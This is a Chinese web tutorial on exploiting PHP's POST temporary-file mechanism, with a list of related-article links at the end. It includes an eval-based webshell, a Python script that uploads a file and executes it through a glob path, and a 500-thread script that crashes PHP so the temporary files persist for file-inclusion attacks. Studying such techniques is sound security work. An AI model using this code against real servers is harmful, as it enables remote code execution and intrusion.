利用PHP?POST临时文件机制实现任意文件上传的方法详解
更新时间:2022-07-25 10:31:58 作者:佚名 
我要评论(0)
向 PHP 发送 Post 数据包,如果数据包中
原理
向 PHP 发送 Post 数据包,如果数据包中包含文件,无论 php 代码中有没有处理文件上传的逻辑,php 都会将这个文件保存为一个临时文件
- 该文件默认存储在
/tmp目录中『可通过php.ini的upload_tmp_dir指定存储位置』 - 文件名为
php[6个随机字符],例:phpG4ef0q - 若本次请求正常结束,临时文件会被自动删除
- 若非正常结束,比如崩溃,临时文件可能会被永久保留
在文件包含漏洞找不到可以利用的文件时,即可利用这个方法,找到临时文件名,然后包含之!
如何获取临时文件名
$_FILES
可以通过 $_FILES 获取文件信息
Array
(
[name] => run.sh
[full_path] => run.sh
[type] =>
[tmp_name] => /tmp/phpoFnbQf
[error] => 0
[size] => 10
)
phpinfo
phpinfo 页面会将当前请求上下文中所有变量都打印出来,若我们直接向 phpinfo页面送包含文件的 post请求,则即可在返回包里找到 $_FILES 变量的内容,从而拿到临时文件名
glob
若上述方法都无法实施,在 Linux 中,还可以通过 glob 通配符 定位文件
glob 简单使用:
*:代替 0 个或 任意个字符?:代替 1 个字符[...]:匹配其中一个字符,例[a,b,c]匹配字符a / b / c{a, b}:匹配 a 或者 b
如何利用该文件
组合请求
虽然文件在请求结束后就自动删除了,但是我们可以把执行 shell 和 上传文件 组合在一个请求中,php 代码如下:
该 php 可以直接执行 shell, 但本例仅为展示如何利用临时文件
# a.php <?php $code = $_GET['code']; eval($code); ?>
Python 脚本利用
# run.sh 文件内容:
# echo $PATH
import requests
# 上传文件同时,执行 shell
url = "http://localhost:8080/a.php?code=echo `. /???/php??????`;"
r = requests.post(url, files={'file': open('./run.sh')})
print(r.text)
# /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin延长临时文件存在时间
部分情况下,我们无法将 上传文件 和 执行shell 组合在一起,利用下述方法使得文件存在更多时间,从而在其他位置进行利用!
可以通过 文件包含 让 php 包含自身从而导致死循环,随后 php 守护进程会因内存溢出而崩溃,但是 php 自身是不会因为错误直接退出的,它会清空自己的内存堆栈,以便从错误中恢复,这就保证了 web 服务的正常运转。
同时该过程也会打断 php 对临时文件的处理,虽然最终仍会被删除,但相较之前可以明显看出临时文件在磁盘的中存在的时间变长了!
基于此,我们便可以编写并发脚本,不断发起 post 文件的请求
import requests
from threading import Thread
def test():
url = "http://localhost:8080/include.php?file=include.php"
r = requests.post(url, files={'file': open('./run.sh')})
print(r.text)
lst = []
for _ in range(500):
t = Thread(target=test)
lst.append(t)
t.start()
for item in lst:
item.join()可以看到,当我们在请求时,磁盘中总是存在尚未被删除的临时文件。直至请求停止,文件被全部删除
于此同时,便可以在其他地方使用上述 glob 路径通配符泛式加载临时文件
import requests url = "http://localhost:8080/a.php?code=echo `. /???/php??????`;" r = requests.get(url) print(r.text) # /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
参考
无字母数字webshell之提高篇
https://www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html
PHP临时文件机制与利用的思考
https://www.anquanke.com/post/id/183046
PHP文件包含漏洞(利用phpinfo)复现
https://github.com/vulhub/vulhub/blob/master/php/inclusion/README.zh-cn.md
glob(7) — Linux manual page
https://man7.org/linux/man-pages/man7/glob.7.html
操作文件和目录
http://billie66.github.io/TLCL/book/chap05.html
到此这篇关于利用 PHP POST 临时文件机制实现任意文件上传的文章就介绍到这了,更多相关php post任意文件上传内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
- PHP使用curl请求实现post方式上传图片文件功能示例
您可能感兴趣的文章:
相关文章
- 目录原理如何获取临时文件名$_FILESphpinfoglob如何利用该文件组合请求延长临时文件存在时间参考原理 向 PHP 发送 Post 数据包,如果数据包中2022-07-25
- 目录一、键、值操作函数二、数组元素个数有关的函数三、使用回调函数处理数组的函数四、数组的排序函数五、拆分,合并,分解,结合数组六、获2022-07-25
- 目录一、安装环境二、下载 三、 邮箱设置四、php发送邮件五、php框架中使用一、安装环境 PHPMailer 需要 PHP 的 sockets 扩展支持 另外登录2022-07-25
- 目录一、代码1、sql2、列表页(index.php)3、delete.php4、update.php5、create.php二、效果图一、代码 1、sql -- phpMyAdmin SQL Dump -- ve2022-07-25
- 目录一、雪花算法原理解析1. 分布式ID常见生成策略2. 雪花算法的结构二、PHP源码实现案例1.demo12.demo2这个算法的好处很简单可以在每秒产生2022-07-25
- 目录前言原理阻塞信号处理信号拼起来思考前言 写过 CLI 常驻进程的老司机肯定遇到过这么一个问题:在需要更新程序的时候,我要怎样才能安全关2022-07-25
- 目录1.Introduction2.Instantiation3.Localization4.Testing Aids()5.Getters6.Setters7.Fluent Setters8.IsSet1.Introduction Carbon 是php2022-07-25
- 目录一、实现代码1.sql2.html3.admin.php(增删改查投票的页面)密码:admi4.index.php投票的页面二、效果图一、实现代码 1.sql -- phpMyAd2022-07-25
- 目录1.效果图2.首先是封装好的图片类(缩放及生成水印)1.GDBasic.php2.Image.php3.ajax类封装文件1.index.php2.图片相关功能处理3.封装好的2022-07-25
- 目录1 什么是注释1.1 注释的目的1.2 注释的格式2 PHP 的注释格式2.1 行注释2.2 多行注释3 小结1 什么是注释 注释就是对代码的解释和说明,其2022-07-25
最新评论